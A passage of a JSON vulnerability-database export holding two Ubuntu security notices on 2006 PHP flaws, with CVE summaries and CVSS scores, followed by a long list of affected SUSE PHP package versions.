"noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php4 - 4:4.3.10-10ubuntu4.8", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php4-cli - 4:4.3.10-10ubuntu4.8", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php4-cgi - 4:4.3.10-10ubuntu4.8", "operator": "lt"}], "description": "The stripos() function did not check for invalidly long or empty haystack strings. In an application that uses this function on arbitrary untrusted data this could be exploited to crash the PHP interpreter. (CVE-2006-4485)\n\nAn integer overflow was discovered in the PHP memory allocation handling. On 64-bit platforms, the \u201cmemory_limit\u201d setting was not enforced correctly. A remote attacker could exploit this to cause a Denial of Service attack through memory exhaustion. (CVE-2006-4486)\n\nMaksymilian Arciemowicz discovered that security relevant configuration options like open_basedir and safe_mode (which can be configured in Apache\u2019s httpd.conf) could be bypassed and reset to their default value in php.ini by using the ini_restore() function. (CVE-2006-4625)\n\nStefan Esser discovered that the ecalloc() function in the Zend engine did not check for integer overflows. This particularly affected the unserialize() function. In applications which unserialize untrusted user-defined data, this could be exploited to execute arbitrary code with the application\u2019s privileges. (CVE-2006-4812)", "edition": 3, "reporter": "Ubuntu", "published": "2006-10-11T00:00:00", "title": "PHP vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-4486", "CVE-2006-4625", "CVE-2006-4485", "CVE-2006-4812"], "modified": "2006-10-11T00:00:00", "id": "USN-362-1", "href": "https://usn.ubuntu.com/362-1/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:38", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2006-3018", "https://people.canonical.com/~ubuntu-security/cve/CVE-2006-1494", "https://people.canonical.com/~ubuntu-security/cve/CVE-2006-0996", "https://people.canonical.com/~ubuntu-security/cve/CVE-2006-1991", "https://people.canonical.com/~ubuntu-security/cve/CVE-2006-2660", "https://people.canonical.com/~ubuntu-security/cve/CVE-2006-3011", "https://people.canonical.com/~ubuntu-security/cve/CVE-2006-1990", "https://people.canonical.com/~ubuntu-security/cve/CVE-2006-1490", "https://people.canonical.com/~ubuntu-security/cve/CVE-2006-1608", "https://people.canonical.com/~ubuntu-security/cve/CVE-2006-3016", "https://people.canonical.com/~ubuntu-security/cve/CVE-2006-2563"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5 - 5.1.2-1ubuntu3.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php4-cli - 4:4.3.10-10ubuntu4.5", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5 - 5.0.5-2ubuntu1.3", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-curl - 5.1.2-1ubuntu3.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-curl - 5.0.5-2ubuntu1.3", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php4-cgi - 4:4.3.10-10ubuntu4.5", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cgi - 5.1.2-1ubuntu3.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cli - 5.0.5-2ubuntu1.3", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cli - 5.1.2-1ubuntu3.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php4 - 4:4.3.10-10ubuntu4.5", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cgi - 5.0.5-2ubuntu1.3", "operator": "lt"}], "description": "The phpinfo() PHP function did not properly sanitize long strings. A remote attacker could use this to perform cross-site scripting attacks against sites that have publicly-available PHP scripts that call phpinfo(). Please note that it is not recommended to publicly expose phpinfo(). (CVE-2006-0996)\n\nAn information disclosure has been reported in the html_entity_decode() function. A script which uses this function to process arbitrary user-supplied input could be exploited to expose a random part of memory, which could potentially reveal sensitive data. (CVE-2006-1490)\n\nThe wordwrap() function did not sufficiently check the validity of the \u2018break\u2019 argument. An attacker who could control the string passed to the \u2018break\u2019 parameter could cause a heap overflow; however, this should not happen in practical applications. (CVE-2006-1990)\n\nThe substr_compare() function did not sufficiently check the validity of the \u2018offset\u2019 argument. A script which passes untrusted user-defined values to this parameter could be exploited to crash the PHP interpreter. (CVE-2006-1991)\n\nIn certain situations, using unset() to delete a hash entry could cause the deletion of the wrong element, which would leave the specified variable defined. This could potentially cause information disclosure in security-relevant operations. (CVE-2006-3017)\n\nIn certain situations the session module attempted to close a data file twice, which led to memory corruption. This could potentially be exploited to crash the PHP interpreter, though that could not be verified. (CVE-2006-3018)\n\nThis update also fixes various bugs which allowed local scripts to bypass open_basedir and \u2018safe mode\u2019 restrictions by passing special arguments to tempnam() (CVE-2006-1494, CVE-2006-2660), copy() (CVE-2006-1608), the curl module (CVE-2006-2563), or error_log() (CVE-2006-3011).", "edition": 3, "reporter": "Ubuntu", "published": "2006-07-19T00:00:00", "title": "PHP vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-2563", "CVE-2006-3011", "CVE-2006-0996", "CVE-2006-1990", "CVE-2006-2660", "CVE-2006-3017", "CVE-2006-3016", "CVE-2006-1991", "CVE-2006-1608", "CVE-2006-3018", "CVE-2006-1490", "CVE-2006-1494"], "modified": "2006-07-19T00:00:00", "id": "USN-320-1", "href": "https://usn.ubuntu.com/320-1/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:23:04", "references": [], "affectedPackage": [{"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-fastcgi-5.1.2-29.14.ppc.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-pgsql-5.1.2-29.14.i586.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-exif-5.1.2-29.14.ia64.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-pear-5.1.2-29.14.x86_64.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "x86_64", "packageFilename": "php4-mbstring-4.3.8-8.31.x86_64.rpm", "packageName": "php4-mbstring", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-mysql-5.1.2-29.14.ia64.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-bcmath-5.0.4-9.17.ppc.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-ftp-5.0.4-9.17.x86_64.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-mysqli-5.1.2-29.14.ppc.rpm", "packageName": "php5-mysqli", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-bcmath-5.1.2-29.14.i586.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-wddx-5.1.2-29.14.ppc.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-pdo-5.1.2-29.14.ia64.rpm", "packageName": "php5-pdo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-devel-5.0.4-9.17.x86_64.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "i586", "packageFilename": "php4-imap-4.3.8-8.31.i586.rpm", "packageName": "php4-imap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-exif-5.1.2-29.14.ppc.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-mysql-5.0.3-14.27.x86_64.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-gd-5.1.2-29.14.x86_64.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-gd-5.1.2-29.14.x86_64.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "x86_64", "packageFilename": "apache2-mod_php4-4.4.0-6.18.x86_64.rpm", "packageName": "apache2-mod_php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-pdo-5.1.2-29.14.x86_64.rpm", "packageName": "php5-pdo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-ftp-5.1.2-29.14.i586.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "x86_64", "packageFilename": "php4-wddx-4.3.8-8.31.x86_64.rpm", "packageName": "php4-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "i586", "packageFilename": "php4-exif-4.3.10-14.28.i586.rpm", "packageName": "php4-exif", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "i586", "packageFilename": "php4-session-4.3.8-8.31.i586.rpm", "packageName": "php4-session", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-curl-5.1.2-29.14.ppc.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-pdo-5.1.2-29.14.i586.rpm", "packageName": "php5-pdo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-fastcgi-5.1.2-29.14.ppc.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-pgsql-5.1.2-29.14.ppc.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-soap-5.0.4-9.17.ppc.rpm", "packageName": "php5-soap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-dom-5.1.2-29.14.x86_64.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "x86_64", "packageFilename": "php4-exif-4.4.0-6.18.x86_64.rpm", "packageName": "php4-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-5.1.2-29.14.ia64.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-mbstring-5.1.2-29.14.x86_64.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-iconv-5.1.2-29.14.ia64.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-ldap-5.1.2-29.14.i586.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-mbstring-5.1.2-29.14.ia64.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-curl-5.1.2-29.14.x86_64.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-dba-5.1.2-29.14.ia64.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-5.1.2-29.14.s390x.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-ldap-5.0.3-14.27.x86_64.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-mbstring-5.0.4-9.17.i586.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-soap-5.0.4-9.17.x86_64.rpm", "packageName": "php5-soap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "i586", "packageFilename": "php4-fastcgi-4.3.10-14.28.i586.rpm", "packageName": "php4-fastcgi", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-xmlrpc-5.1.2-29.14.x86_64.rpm", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-gd-5.1.2-29.14.i586.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-devel-5.1.2-29.14.ppc.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-mysqli-5.1.2-29.14.ia64.rpm", "packageName": "php5-mysqli", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-mbstring-5.1.2-29.14.s390x.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "apache2-mod_php5-5.1.2-29.14.x86_64.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-ftp-5.1.2-29.14.ppc.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-ftp-5.1.2-29.14.x86_64.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-devel-5.1.2-29.14.x86_64.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "i586", "packageFilename": "php4-pgsql-4.3.10-14.28.i586.rpm", "packageName": "php4-pgsql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-5.1.2-29.14.ppc.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "i586", "packageFilename": "php4-curl-4.3.8-8.31.i586.rpm", "packageName": "php4-curl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-mysql-5.1.2-29.14.x86_64.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "ppc", "packageFilename": "php4-session-4.4.0-6.18.ppc.rpm", "packageName": "php4-session", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "x86_64", "packageFilename": "php4-fastcgi-4.4.0-6.18.x86_64.rpm", "packageName": "php4-fastcgi", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-ftp-5.0.4-9.17.i586.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-wddx-5.0.4-9.17.i586.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "x86_64", "packageFilename": "mod_php4-servlet-4.3.8-8.31.x86_64.rpm", "packageName": "mod_php4-servlet", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "x86_64", "packageFilename": "php4-session-4.3.8-8.31.x86_64.rpm", "packageName": "php4-session", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-fastcgi-5.1.2-29.14.ia64.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-mysqli-5.0.3-14.27.i586.rpm", "packageName": "php5-mysqli", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-5.0.4-9.17.x86_64.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-imap-5.0.4-9.17.i586.rpm", "packageName": "php5-imap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "apache2-mod_php5-5.1.2-29.14.s390x.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "x86_64", "packageFilename": "php4-wddx-4.4.0-6.18.x86_64.rpm", "packageName": "php4-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-ldap-5.1.2-29.14.x86_64.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-devel-5.0.4-9.17.i586.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-iconv-5.1.2-29.14.i586.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-dom-5.1.2-29.14.ia64.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-devel-5.1.2-29.14.x86_64.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "i586", "packageFilename": "php4-sysvshm-4.3.8-8.31.i586.rpm", "packageName": "php4-sysvshm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-bcmath-5.1.2-29.14.ppc.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "x86_64", "packageFilename": "php4-mbstring-4.3.10-14.28.x86_64.rpm", "packageName": "php4-mbstring", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "ppc", "packageFilename": "php4-exif-4.4.0-6.18.ppc.rpm", "packageName": "php4-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-fastcgi-5.1.2-29.14.x86_64.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "x86_64", "packageFilename": "php4-pear-4.3.8-8.31.x86_64.rpm", "packageName": "php4-pear", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "x86_64", "packageFilename": "php4-pear-4.3.10-14.28.x86_64.rpm", "packageName": "php4-pear", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-mysqli-5.1.2-29.14.ppc.rpm", "packageName": "php5-mysqli", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-curl-5.1.2-29.14.ia64.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-pgsql-5.1.2-29.14.ppc.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "apache2-mod_php5-5.0.4-9.17.ppc.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "x86_64", "packageFilename": "php4-4.3.10-14.28.x86_64.rpm", "packageName": "php4", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-exif-5.1.2-29.14.i586.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-bcmath-5.1.2-29.14.s390x.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-iconv-5.0.4-9.17.ppc.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-mysql-5.1.2-29.14.s390x.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-wddx-5.1.2-29.14.x86_64.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-5.1.2-29.14.i586.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "apache2-mod_php5-5.1.2-29.14.ia64.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-fastcgi-5.1.2-29.14.x86_64.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-ftp-5.1.2-29.14.x86_64.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-fastcgi-5.0.4-9.17.x86_64.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-wddx-5.1.2-29.14.s390x.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-pgsql-5.0.4-9.17.x86_64.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "ppc", "packageFilename": "php4-curl-4.4.0-6.18.ppc.rpm", "packageName": "php4-curl", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "ppc", "packageFilename": "php4-4.4.0-6.18.ppc.rpm", "packageName": "php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-devel-5.1.2-29.14.i586.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-bcmath-5.1.2-29.14.i586.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "x86_64", "packageFilename": "php4-mbstring-4.4.0-6.18.x86_64.rpm", "packageName": "php4-mbstring", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-curl-5.0.3-14.27.x86_64.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "i586", "packageFilename": "php4-session-4.3.10-14.28.i586.rpm", 